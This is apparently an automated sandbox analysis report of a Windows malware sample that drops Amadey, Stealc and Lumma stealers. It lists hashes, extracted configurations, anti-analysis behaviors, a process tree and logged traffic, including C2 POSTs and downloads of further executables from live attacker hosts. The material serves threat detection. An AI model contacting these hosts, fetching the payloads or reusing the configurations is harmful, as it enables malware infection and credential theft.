Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    142s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/11/2024, 03:04 UTC

General

  • Target

    766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe

  • Size

    3.1MB

  • MD5

    74ba48529515c95320f4a86fc42fc668

  • SHA1

    c33b2b0c5e43e5ac274206ae964cf85bb8718048

  • SHA256

    766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa

  • SHA512

    16f09889b08eb9a4c2176ccfb590e31007c0c49336ba7aef6d54f16c6133c36945b3281ff7a4ff0099a0cae1eae12be2846ab24dbe1f977000953eb2868e85f8

  • SSDEEP

    98304:XmP6PUaaDfBgWBPTrdEdsgxYC2JyLce9ebFyZgk6TR:XcqZexyV6T

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

stealc

Botnet

tale

C2

http://185.215.113.206

Attributes
  • url_path

    /6c4adf523b719729.php

Extracted

Family

lumma

C2

https://founpiuer.store/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
    "C:\Users\Admin\AppData\Local\Temp\766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:540
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Users\Admin\AppData\Local\Temp\1004745001\71b8acff7f.exe
        "C:\Users\Admin\AppData\Local\Temp\1004745001\71b8acff7f.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1296
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 1468
          4⤵
          • Program crash
          PID:2896
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 1508
          4⤵
          • Program crash
          PID:4572
      • C:\Users\Admin\AppData\Local\Temp\1004746001\e1ae7b97ca.exe
        "C:\Users\Admin\AppData\Local\Temp\1004746001\e1ae7b97ca.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3740
      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
        "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
        3⤵
          PID:4472
        • C:\Users\Admin\AppData\Local\Temp\1004748001\5685e027dd.exe
          "C:\Users\Admin\AppData\Local\Temp\1004748001\5685e027dd.exe"
          3⤵
          • Modifies Windows Defender Real-time Protection settings
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Windows security modification
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4252
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:2748
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1296 -ip 1296
      1⤵
        PID:3584
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1296 -ip 1296
        1⤵
          PID:4652
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          1⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:3296
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          1⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:1660

        Network

        • flag-us
          DNS
          8.8.8.8.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          8.8.8.8.in-addr.arpa
          IN PTR
          Response
          8.8.8.8.in-addr.arpa
          IN PTR
          dnsgoogle
        • flag-us
          DNS
          8.8.8.8.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          8.8.8.8.in-addr.arpa
          IN PTR
        • flag-us
          DNS
          232.168.11.51.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          232.168.11.51.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          106.209.201.84.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          106.209.201.84.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          106.209.201.84.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          106.209.201.84.in-addr.arpa
          IN PTR
        • flag-us
          DNS
          20.160.190.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          20.160.190.20.in-addr.arpa
          IN PTR
          Response
        • flag-ru
          POST
          http://185.215.113.43/Zu7JuNko/index.php
          skotes.exe
          Remote address:
          185.215.113.43:80
          Request
          POST /Zu7JuNko/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 185.215.113.43
          Content-Length: 4
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 08 Nov 2024 03:04:54 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Refresh: 0; url = Login.php
        • flag-ru
          POST
          http://185.215.113.43/Zu7JuNko/index.php
          skotes.exe
          Remote address:
          185.215.113.43:80
          Request
          POST /Zu7JuNko/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 185.215.113.43
          Content-Length: 158
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 08 Nov 2024 03:04:56 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-ru
          POST
          http://185.215.113.43/Zu7JuNko/index.php
          skotes.exe
          Remote address:
          185.215.113.43:80
          Request
          POST /Zu7JuNko/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 185.215.113.43
          Content-Length: 31
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 08 Nov 2024 03:05:23 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-ru
          POST
          http://185.215.113.43/Zu7JuNko/index.php
          skotes.exe
          Remote address:
          185.215.113.43:80
          Request
          POST /Zu7JuNko/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 185.215.113.43
          Content-Length: 31
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 08 Nov 2024 03:05:31 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-ru
          POST
          http://185.215.113.43/Zu7JuNko/index.php
          skotes.exe
          Remote address:
          185.215.113.43:80
          Request
          POST /Zu7JuNko/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 185.215.113.43
          Content-Length: 31
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 08 Nov 2024 03:05:33 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-ru
          POST
          http://185.215.113.43/Zu7JuNko/index.php
          skotes.exe
          Remote address:
          185.215.113.43:80
          Request
          POST /Zu7JuNko/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 185.215.113.43
          Content-Length: 31
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 08 Nov 2024 03:05:41 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-us
          DNS
          95.221.229.192.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          95.221.229.192.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          43.113.215.185.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          43.113.215.185.in-addr.arpa
          IN PTR
          Response
        • flag-ru
          GET
          http://185.215.113.16/luma/random.exe
          skotes.exe
          Remote address:
          185.215.113.16:80
          Request
          GET /luma/random.exe HTTP/1.1
          Host: 185.215.113.16
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 08 Nov 2024 03:05:00 GMT
          Content-Type: application/octet-stream
          Content-Length: 3152896
          Last-Modified: Fri, 08 Nov 2024 02:43:37 GMT
          Connection: keep-alive
          ETag: "672d7ad9-301c00"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.16/steam/random.exe
          skotes.exe
          Remote address:
          185.215.113.16:80
          Request
          GET /steam/random.exe HTTP/1.1
          Host: 185.215.113.16
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 08 Nov 2024 03:05:26 GMT
          Content-Type: application/octet-stream
          Content-Length: 2158592
          Last-Modified: Fri, 08 Nov 2024 02:43:50 GMT
          Connection: keep-alive
          ETag: "672d7ae6-20f000"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.16/off/random.exe
          skotes.exe
          Remote address:
          185.215.113.16:80
          Request
          GET /off/random.exe HTTP/1.1
          Host: 185.215.113.16
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 08 Nov 2024 03:05:36 GMT
          Content-Type: application/octet-stream
          Content-Length: 2828800
          Last-Modified: Fri, 08 Nov 2024 02:26:35 GMT
          Connection: keep-alive
          ETag: "672d76db-2b2a00"
          Accept-Ranges: bytes
        • flag-us
          DNS
          209.205.72.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          209.205.72.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          16.113.215.185.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          16.113.215.185.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          28.118.140.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          28.118.140.52.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          28.118.140.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          28.118.140.52.in-addr.arpa
          IN PTR
        • flag-us
          DNS
          28.118.140.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          28.118.140.52.in-addr.arpa
          IN PTR
        • flag-us
          DNS
          28.118.140.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          28.118.140.52.in-addr.arpa
          IN PTR
        • flag-us
          DNS
          197.87.175.4.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          197.87.175.4.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          241.150.49.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          241.150.49.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          241.150.49.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          241.150.49.20.in-addr.arpa
          IN PTR
        • flag-us
          DNS
          241.150.49.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          241.150.49.20.in-addr.arpa
          IN PTR
        • flag-us
          DNS
          241.150.49.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          241.150.49.20.in-addr.arpa
          IN PTR
        • flag-us
          DNS
          241.150.49.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          241.150.49.20.in-addr.arpa
          IN PTR
        • flag-us
          DNS
          presticitpo.store
          71b8acff7f.exe
          Remote address:
          8.8.8.8:53
          Request
          presticitpo.store
          IN A
          Response
        • flag-us
          DNS
          crisiwarny.store
          71b8acff7f.exe
          Remote address:
          8.8.8.8:53
          Request
          crisiwarny.store
          IN A
          Response
        • flag-us
          DNS
          fadehairucw.store
          71b8acff7f.exe
          Remote address:
          8.8.8.8:53
          Request
          fadehairucw.store
          IN A
          Response
        • flag-us
          DNS
          thumbystriw.store
          71b8acff7f.exe
          Remote address:
          8.8.8.8:53
          Request
          thumbystriw.store
          IN A
          Response
        • flag-us
          DNS
          thumbystriw.store
          71b8acff7f.exe
          Remote address:
          8.8.8.8:53
          Request
          thumbystriw.store
          IN A
        • flag-us
          DNS
          necklacedmny.store
          71b8acff7f.exe
          Remote address:
          8.8.8.8:53
          Request
          necklacedmny.store
          IN A
        • flag-us
          DNS
          necklacedmny.store
          71b8acff7f.exe
          Remote address:
          8.8.8.8:53
          Request
          necklacedmny.store
          IN A
        • flag-us
          DNS
          necklacedmny.store
          71b8acff7f.exe
          Remote address:
          8.8.8.8:53
          Request
          necklacedmny.store
          IN A
        • flag-us
          DNS
          necklacedmny.store
          71b8acff7f.exe
          Remote address:
          8.8.8.8:53
          Request
          necklacedmny.store
          IN A
        • flag-us
          DNS
          necklacedmny.store
          71b8acff7f.exe
          Remote address:
          8.8.8.8:53
          Request
          necklacedmny.store
          IN A
        • flag-us
          DNS
          18.31.95.13.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          18.31.95.13.in-addr.arpa
          IN PTR
          Response
        • flag-ru
          GET
          http://185.215.113.206/
          e1ae7b97ca.exe
          Remote address:
          185.215.113.206:80
          Request
          GET / HTTP/1.1
          Host: 185.215.113.206
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Fri, 08 Nov 2024 03:05:30 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-ru
          POST
          http://185.215.113.206/6c4adf523b719729.php
          e1ae7b97ca.exe
          Remote address:
          185.215.113.206:80
          Request
          POST /6c4adf523b719729.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----BAEGCGCGIEGDHIDHJJEH
          Host: 185.215.113.206
          Content-Length: 211
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Fri, 08 Nov 2024 03:05:30 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 8
          Keep-Alive: timeout=5, max=99
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-us
          DNS
          206.113.215.185.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          206.113.215.185.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          founpiuer.store
          71b8acff7f.exe
          Remote address:
          8.8.8.8:53
          Request
          founpiuer.store
          IN A
          Response
          founpiuer.store
          IN A
          104.21.5.155
          founpiuer.store
          IN A
          172.67.133.135
        • flag-us
          DNS
          founpiuer.store
          71b8acff7f.exe
          Remote address:
          8.8.8.8:53
          Request
          founpiuer.store
          IN A
        • flag-us
          DNS
          founpiuer.store
          71b8acff7f.exe
          Remote address:
          8.8.8.8:53
          Request
          founpiuer.store
          IN A
        • flag-us
          DNS
          founpiuer.store
          71b8acff7f.exe
          Remote address:
          8.8.8.8:53
          Request
          founpiuer.store
          IN A
        • flag-us
          DNS
          75.117.19.2.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          75.117.19.2.in-addr.arpa
          IN PTR
          Response
          75.117.19.2.in-addr.arpa
          IN PTR
          a2-19-117-75deploystaticakamaitechnologiescom
        • flag-us
          DNS
          75.117.19.2.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          75.117.19.2.in-addr.arpa
          IN PTR
        • flag-us
          POST
          https://founpiuer.store/api
          71b8acff7f.exe
          Remote address:
          104.21.5.155:443
          Request
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: founpiuer.store
          Response
          HTTP/1.1 403 Forbidden
          Date: Fri, 08 Nov 2024 03:05:38 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          X-Frame-Options: SAMEORIGIN
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TI%2FPT04%2FWP%2Bocu2N6gxCblweQnhVwYrt23yYjQU%2Frole4AvDddc6%2BdVpJiN5KNu79AbjZc7R1CrcvHBZWiw%2BgFNLyjnEf4veR1f2C6AK13qoKZI%2B%2F6tuMyATA4ACFwUqezI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8df257b27aebbda0-LHR
        • flag-us
          POST
          https://founpiuer.store/api
          71b8acff7f.exe
          Remote address:
          104.21.5.155:443
          Request
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          Cookie: __cf_mw_byp=Hl5sv1NETPETgsrAnXBkc1LI.ccTVaYKai9EgCsvnsg-1731035138-0.0.1.1-/api
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 52
          Host: founpiuer.store
          Response
          HTTP/1.1 200 OK
          Date: Fri, 08 Nov 2024 03:05:39 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Set-Cookie: PHPSESSID=itv2q58qggv27129205rms8gdp; expires=Mon, 03-Mar-2025 20:52:18 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          cf-cache-status: DYNAMIC
          vary: accept-encoding
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d2s6fLTd07wIRITiCZUTxPBNXZr1%2FWaBZIi5qfgaCuzymsBWFvyL9cwyOHviHYeGbrV8idukv4I2Gg0iKWrL1ifYuV1j9Uo7FTgEJj%2FIHpSzYraiKAngzXEBPEft7COvQ1c%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8df257b32b57bda0-LHR
          alt-svc: h3=":443"; ma=86400
          server-timing: cfL4;desc="?proto=TCP&rtt=49524&sent=14&recv=13&lost=0&retrans=0&sent_bytes=8460&recv_bytes=1065&delivery_rate=188472&cwnd=257&unsent_bytes=0&cid=a817319027210647&ts=383&x=0"
        • flag-us
          DNS
          155.5.21.104.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          155.5.21.104.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          172.214.232.199.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          172.214.232.199.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          14.227.111.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          14.227.111.52.in-addr.arpa
          IN PTR
          Response
        • 185.215.113.43:80
          http://185.215.113.43/Zu7JuNko/index.php
          http
          skotes.exe
          2.8kB
          3.7kB
          27
          19

          HTTP Request

          POST http://185.215.113.43/Zu7JuNko/index.php

          HTTP Response

          200

          HTTP Request

          POST http://185.215.113.43/Zu7JuNko/index.php

          HTTP Response

          200

          HTTP Request

          POST http://185.215.113.43/Zu7JuNko/index.php

          HTTP Response

          200

          HTTP Request

          POST http://185.215.113.43/Zu7JuNko/index.php

          HTTP Response

          200

          HTTP Request

          POST http://185.215.113.43/Zu7JuNko/index.php

          HTTP Response

          200

          HTTP Request

          POST http://185.215.113.43/Zu7JuNko/index.php

          HTTP Response

          200
        • 185.215.113.16:80
          http://185.215.113.16/off/random.exe
          http
          skotes.exe
          279.5kB
          8.4MB
          6018
          6010

          HTTP Request

          GET http://185.215.113.16/luma/random.exe

          HTTP Response

          200

          HTTP Request

          GET http://185.215.113.16/steam/random.exe

          HTTP Response

          200

          HTTP Request

          GET http://185.215.113.16/off/random.exe

          HTTP Response

          200
        • 185.215.113.206:80
          http://185.215.113.206/6c4adf523b719729.php
          http
          e1ae7b97ca.exe
          957 B
          745 B
          10
          8

          HTTP Request

          GET http://185.215.113.206/

          HTTP Response

          200

          HTTP Request

          POST http://185.215.113.206/6c4adf523b719729.php

          HTTP Response

          200
        • 104.21.5.155:443
          https://founpiuer.store/api
          tls, http
          71b8acff7f.exe
          1.7kB
          10.2kB
          15
          17

          HTTP Request

          POST https://founpiuer.store/api

          HTTP Response

          403

          HTTP Request

          POST https://founpiuer.store/api

          HTTP Response

          200
        • 8.8.8.8:53
          8.8.8.8.in-addr.arpa
          dns
          132 B
          90 B
          2
          1

          DNS Request

          8.8.8.8.in-addr.arpa

          DNS Request

          8.8.8.8.in-addr.arpa

        • 8.8.8.8:53
          232.168.11.51.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          232.168.11.51.in-addr.arpa

        • 8.8.8.8:53
          106.209.201.84.in-addr.arpa
          dns
          146 B
          133 B
          2
          1

          DNS Request

          106.209.201.84.in-addr.arpa

          DNS Request

          106.209.201.84.in-addr.arpa

        • 8.8.8.8:53
          20.160.190.20.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          20.160.190.20.in-addr.arpa

        • 8.8.8.8:53
          95.221.229.192.in-addr.arpa
          dns
          73 B
          144 B
          1
          1

          DNS Request

          95.221.229.192.in-addr.arpa

        • 8.8.8.8:53
          43.113.215.185.in-addr.arpa
          dns
          73 B
          133 B
          1
          1

          DNS Request

          43.113.215.185.in-addr.arpa

        • 8.8.8.8:53
          16.113.215.185.in-addr.arpa
          dns
          73 B
          133 B
          1
          1

          DNS Request

          16.113.215.185.in-addr.arpa

        • 8.8.8.8:53
          209.205.72.20.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          209.205.72.20.in-addr.arpa

        • 8.8.8.8:53
          28.118.140.52.in-addr.arpa
          dns
          288 B
          158 B
          4
          1

          DNS Request

          28.118.140.52.in-addr.arpa

          DNS Request

          28.118.140.52.in-addr.arpa

          DNS Request

          28.118.140.52.in-addr.arpa

          DNS Request

          28.118.140.52.in-addr.arpa

        • 8.8.8.8:53
          197.87.175.4.in-addr.arpa
          dns
          71 B
          157 B
          1
          1

          DNS Request

          197.87.175.4.in-addr.arpa

        • 8.8.8.8:53
          241.150.49.20.in-addr.arpa
          dns
          360 B
          158 B
          5
          1

          DNS Request

          241.150.49.20.in-addr.arpa

          DNS Request

          241.150.49.20.in-addr.arpa

          DNS Request

          241.150.49.20.in-addr.arpa

          DNS Request

          241.150.49.20.in-addr.arpa

          DNS Request

          241.150.49.20.in-addr.arpa

        • 8.8.8.8:53
          presticitpo.store
          dns
          71b8acff7f.exe
          63 B
          128 B
          1
          1

          DNS Request

          presticitpo.store

        • 8.8.8.8:53
          crisiwarny.store
          dns
          71b8acff7f.exe
          62 B
          127 B
          1
          1

          DNS Request

          crisiwarny.store

        • 8.8.8.8:53
          fadehairucw.store
          dns
          71b8acff7f.exe
          63 B
          128 B
          1
          1

          DNS Request

          fadehairucw.store

        • 8.8.8.8:53
          thumbystriw.store
          dns
          71b8acff7f.exe
          126 B
          128 B
          2
          1

          DNS Request

          thumbystriw.store

          DNS Request

          thumbystriw.store

        • 8.8.8.8:53
          necklacedmny.store
          dns
          71b8acff7f.exe
          320 B
          5

          DNS Request

          necklacedmny.store

          DNS Request

          necklacedmny.store

          DNS Request

          necklacedmny.store

          DNS Request

          necklacedmny.store

          DNS Request

          necklacedmny.store

        • 8.8.8.8:53
          18.31.95.13.in-addr.arpa
          dns
          70 B
          144 B
          1
          1

          DNS Request

          18.31.95.13.in-addr.arpa

        • 8.8.8.8:53
          206.113.215.185.in-addr.arpa
          dns
          74 B
          134 B
          1
          1

          DNS Request

          206.113.215.185.in-addr.arpa

        • 8.8.8.8:53
          founpiuer.store
          dns
          71b8acff7f.exe
          244 B
          93 B
          4
          1

          DNS Request

          founpiuer.store

          DNS Request

          founpiuer.store

          DNS Request

          founpiuer.store

          DNS Request

          founpiuer.store

          DNS Response

          104.21.5.155
          172.67.133.135

        • 8.8.8.8:53
          75.117.19.2.in-addr.arpa
          dns
          140 B
          133 B
          2
          1

          DNS Request

          75.117.19.2.in-addr.arpa

          DNS Request

          75.117.19.2.in-addr.arpa

        • 8.8.8.8:53
          155.5.21.104.in-addr.arpa
          dns
          71 B
          133 B
          1
          1

          DNS Request

          155.5.21.104.in-addr.arpa

        • 8.8.8.8:53
          172.214.232.199.in-addr.arpa
          dns
          74 B
          128 B
          1
          1

          DNS Request

          172.214.232.199.in-addr.arpa

        • 8.8.8.8:53
          14.227.111.52.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          14.227.111.52.in-addr.arpa

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\1004745001\71b8acff7f.exe

          Filesize

          3.0MB

          MD5

          dceb05bdd62c6c55ab493ccd4d6ca445

          SHA1

          236ca65f1dbfdc4a06140af7871cd4aa8d2ba1d1

          SHA256

          e293319a6bb1415044af45cf66026b591dc5f72c8e83c39e35af8c5e6579c7e5

          SHA512

          59d9ea396546a2b8ca2de08a791f7954c1286837c6effa24ec858f79af0464c4e20136bdc7d7acb7655e2403e1377fe3615b9d52bc75bc9bb8161007922783c9

        • C:\Users\Admin\AppData\Local\Temp\1004746001\e1ae7b97ca.exe

          Filesize

          2.1MB

          MD5

